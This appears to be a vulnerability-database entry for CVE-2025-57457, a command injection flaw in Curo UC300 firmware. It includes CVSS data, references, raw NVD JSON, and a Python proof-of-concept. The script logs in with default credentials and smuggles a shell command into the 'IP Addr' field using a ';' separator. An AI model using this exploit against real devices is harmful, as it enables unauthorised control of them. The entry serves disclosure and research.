CVE-2025-57457

Description

An OS Command Injection vulnerability in the Admin panel in Curo UC300 5.42.1.7.1.63R1 allows local attackers to inject arbitrary OS Commands via the "IP Addr" parameter.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Curo UC300 5.42.1.7.1.63R1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-57457 - Curo UC300 OS Command Injection PoC
# Vulnerability: OS Command Injection via "IP Addr" parameter in Admin Panel
# Affected: Curo UC300 5.42.1.7.1.63R1

import requests
import sys

TARGET_URL = "http://target-curo-uc300"
ADMIN_PATH = "/admin"
USERNAME = "admin"
PASSWORD = "password"

def exploit(target, cmd):
    """Exploit OS command injection via IP Addr parameter"""
    session = requests.Session()
    
    # Step 1: Login to admin panel
    login_url = f"{target}{ADMIN_PATH}/login"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    resp = session.post(login_url, data=login_data)
    
    if resp.status_code != 200:
        print("[!] Login failed")
        return
    
    print("[*] Logged in successfully")
    
    # Step 2: Inject command via IP Addr parameter
    # Payload format: <valid_ip>;<command>
    payload = f"127.0.0.1;{cmd}"
    
    inject_url = f"{target}{ADMIN_PATH}/network/settings"
    inject_data = {
        "ip_addr": payload,
        "action": "save"
    }
    
    resp = session.post(inject_url, data=inject_data)
    print(f"[*] Payload sent: {payload}")
    print(f"[*] Response status: {resp.status_code}")
    
    return resp.text

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url> [command]")
        print(f"Example: {sys.argv[0]} http://192.168.1.100 'id'")
        sys.exit(1)
    
    target = sys.argv[1]
    cmd = sys.argv[2] if len(sys.argv) > 2 else "id"
    
    result = exploit(target, cmd)
    if result:
        print(f"[*] Response:\n{result}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-57457
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-57457
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-57457/
[4] VulDB https://vuldb.com/cve/CVE-2025-57457
[5] http://curo.com
[6] https://github.com/restdone/CVE-2025-57457/tree/main

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-57457", "sourceIdentifier": "[email protected]", "published": "2025-10-08T19:15:44.563", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An OS Command Injection vulnerability in the Admin panel in Curo UC300 5.42.1.7.1.63R1 allows local attackers to inject arbitrary OS Commands via the \"IP Addr\" parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "http://curo.com", "source": "[email protected]"}, {"url": "https://github.com/restdone/CVE-2025-57457/tree/main", "source": "[email protected]"}]}}